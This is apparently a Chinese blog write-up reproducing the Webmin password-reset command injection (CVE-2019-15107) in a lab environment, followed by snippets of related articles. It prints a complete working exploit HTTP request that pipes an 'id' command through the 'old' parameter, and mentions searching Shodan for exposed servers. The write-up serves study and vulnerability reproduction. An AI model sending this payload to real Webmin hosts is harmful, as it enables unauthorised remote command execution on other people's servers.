Webmin-RCE(CVE-2019-15107)

最新推荐文章于 2025-03-12 07:03:54 发布
最新推荐文章于 2025-03-12 07:03:54 发布
阅读量1k 收藏 2
点赞数 26
分类专栏: 漏洞复现 文章标签: webmin 安全漏洞 linux 运维 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43571759/article/details/105812437
版权
本文详细介绍Webmin远程命令执行漏洞(CVE-2019-15107)的复现过程。Webmin是一款用于管理类Unix系统的配置工具,其默认端口为10000。文章指出在找回密码功能中存在无需权限的命令注入漏洞,攻击者可通过此漏洞执行任意系统命令。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

学习linux运维的应该很熟悉webmin,本人学校最近刚开始上这个课也需要用到webmin,既然碰到这个当然不能放过想着把漏洞复现一下

Webmin 远程命令执行漏洞(CVE-2019-15107)

webmin工具介绍

  • webmin是一个基于web的系统管理界面。借助任何支持表格和表单的浏览器,你就可以设置用户账号、DNS、apache、文件共享等。webmin包括一个简单的web服务器和许多cgi程序,这些程序可以直接修改系统文件,比如/etc/inetd.conf和/etc/passwd。web服务器和所有的cgi程序都是Perl5编写的,没有使用任何非标准的Perl模块,也就是说,webmin是一个用Perl语言写的、可以通过浏览器管理Linux软件。

Webmin是一个用于管理类Unix系统的管理配置工具,其默认端口是10000,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。

漏洞复现

进入环境访问your-ip:10000会显示,This web server is running in SSL mode. Try the URL https://c16949cecfbd:10000/ instead.

在这里插入图片描述

需要进入配置文件/etc/webmin/miniserv.conf中将ssl设置为0,就能正常访问了

根据文件中提示发送发送如下数据包,即可执行命令id

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|id&new1=test2&new2=test2

如图,浏览器返回内容中显示了id命令执行的结果。

在这里插入图片描述

这里是利用密码重置功能发生了缺陷,对用户输入未进行过滤,通过管道符实现命令执行

ps:只有在发送的user参数的值不是已知Linux用户的情况下,才会进入到修改/etc/shadow的地方,触发命令注入漏洞。

漏洞复现完成后去shodan瞧了瞧

在这里插入图片描述
之前对webmin不了解,我觉得现在应该去熟悉一下webmin了。。。

CVE-2019-15107 Webmin远程命令执行漏洞复现
墨痕诉清风的博客
11-05 734
在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。根据最新消息,该应用在官方提供的sourceforge下载的源码才包含这个漏洞,而官方Github上的代码是安全的。在sourceforge上下载,链接如下。这里的user值要是用的是一个假的用户,使用真实的root测试不成功,只有在发送的用户参数的值不是已知的Linux用户的情况下(而参考链接中是user=root123),展示进入才会到修改/etc/shadow的地方,触发命令注入漏洞。查看response。.
Webmin(CVE-2021-31760)CSRF-RCE环境搭建-漏洞复现
weixin_45006525的博客
04-29 1705
Webmin(CVE-2021-31760) 漏洞简介: Webmin是基于Web的界面的用于类Unix的系统管理工具。该工具基于BS架构,可以让你很轻易的使用任何现代的Web浏览器,很轻易的管理您的服务器。 近日,Webmin官方通告了三个CVE漏洞,包括CVE-2021-31760,CVE-2021-31761,CVE-2021-31762。远程攻击者可以通过社工管理员,通过CSRF漏洞以及XSS漏洞,实现对远程服务器的代码执行,进而控制并接管服务器。 以下复现第一个CVE-2021-31760 影响范
webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 2122
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了
CVE-2019-15107_WEBMIN_RCE漏洞复现
dust_hk的博客
08-23 1877
0x00 简介 Webmin是一个基于Web的界面,用于Unix的系统管理。使用任何现代Web浏览器,您可以设置用户帐户,Apache,DNS,文件共享等等。Webmin无需手动编辑/ etc / passwd等 Unix配置文件,并允许您从控制台或远程管理系统。Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。目前...
Vulnhub-Source-1(CVE-2019-15107
最新发布
weixin_55010563的博客
03-12 154
这个框可能会出现在供应链攻击的后续房间里,因为它是一个很好的最新例子。没什么可以利用的信息,看到10000端口版本信息,MiniServ 1.890 (Webmin httpd)如果遇到不兼容的情况,可以打开.vmx修改,改为和虚拟机一个版本号。访问10000端口,是一个登录网站,源码和指纹信息都没有什么利用点。CVE-2019-15107-Webmin远程命令执行漏洞。选中下载的ova文件,然后导入选择一个存放路径即可。想到刚才找到的网站版本号,查找一下历史漏洞。dirsearch扫描看看,扫不出来。
Webmin 远程命令执行漏洞(CVE-2019-15107
m0_57206390的博客
10-25 658
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。 该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。
Webmin (CVE-2019-15107) 远程命令执行漏洞复现
来日可期的博客
10-13 1475
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。访问https://127.0.0.1:10000/password_change.cgi。然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。还可以使用HackBar,发送POST请求包,并添加攻击Payload。访问靶场地址https://127.0.0.1:10000/漏洞影响版本为Webmin
CVE-2019-15107
05-23
CVE-2019-15107 Webmin(1.890-1.920)后门RCE漏洞的Python实现 基于针对相同漏洞利用的Metasploit模块( ) 漏洞利用大多是自动的。 请参阅./CVE-2019-15107.py --help以了解完整的开关范围 警告:此存储库中的...
Webmin后门漏洞CVE-2019-15107的Python利用方法
资源摘要信息:"CVE-2019-15107是一个在Webmin软件中的安全漏洞Webmin是一款基于Web的系统管理工具,用于Linux和其他类Unix系统。它允许管理员通过Web界面执行系统管理任务,例如用户管理、服务配置和更改系统配置...
CVE-2022-36446 Webmin命令注入漏洞
weixin_45705830的博客
03-02 536
CVE-2022-36446是一个Webmin的任意命令注入漏洞,影响了1.997版本之前的Webmin。该漏洞存在于software/apt-lib.pl文件中,由于缺乏对用户输入的HTML转义,导致可以注入将连接到包管理器调用的任意命令。该漏洞可以被远程未经身份验证的攻击者利用,执行任意代码或获取系统权限。
CVE-2019-15107 webmin RCE漏洞复现
永远是少年
12-10 1211
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webmin RCE漏洞复现。 一、CVE-2019-15107 webmin RCE漏洞简介与环境搭建 二、CVE-2019-15107 webmin RCE实战
Webmin 远程命令执行漏洞(CVE-2019-15107)复现
weixin_44522540的博客
05-03 828
一、环境搭建 本次采用vulhub进行复现 二、复现过程 POST /password_change.cgi HTTP/1.1 Host: 192.168.252.145:10000 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif
【漏洞复现】Webmin 远程命令执行(CVE-2019-15107)
过期的秋刀鱼
11-05 843
1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。直接访问https://your-ip:10000/password_change.cgi。上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,后面接执行的命令。
webmin RCE漏洞利用及分析
weixin_30564901的博客
08-23 415
  Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。 利用条件:webmin <=1.910 原因:官网 SourceForge代码中存在漏洞,github代码中无漏洞,为后门植入,不得不佩服这些老外真会玩,看了一堆大神分析,自己简单记录下。 前面参数传递暂时不提,看下面这段代码,在perl...
CVE-2019-15107Webmin远程命令执行漏洞复现
qq_51459600的博客
01-04 3801
CVE-2019-15107 Webmin远程命令执行漏洞复现 漏洞影响版本为Webmin<=1.920 Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。 环境搭建 靶机:CentOS7(192.168.2.101) webmin在ssl模式下是无法显示界面的,我
RCE代码及命令执行漏洞简解
weixin_46739058的博客
04-09 2394
在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用 代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代 码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏 洞。同样调用系统命令处理,将造成命令执行漏洞。 RCE:远程命令/代码执行(remote command/code execute) 在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符
漏洞复现-webmin漏洞系列分析与利用
aming小老弟
05-18 3152
webmin远程命令执行漏洞目标简介漏洞描述漏洞利用条件:漏洞复现构造POC构造EXP漏洞分析被植入后门依据修复建议 目标简介 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。 使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 L
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值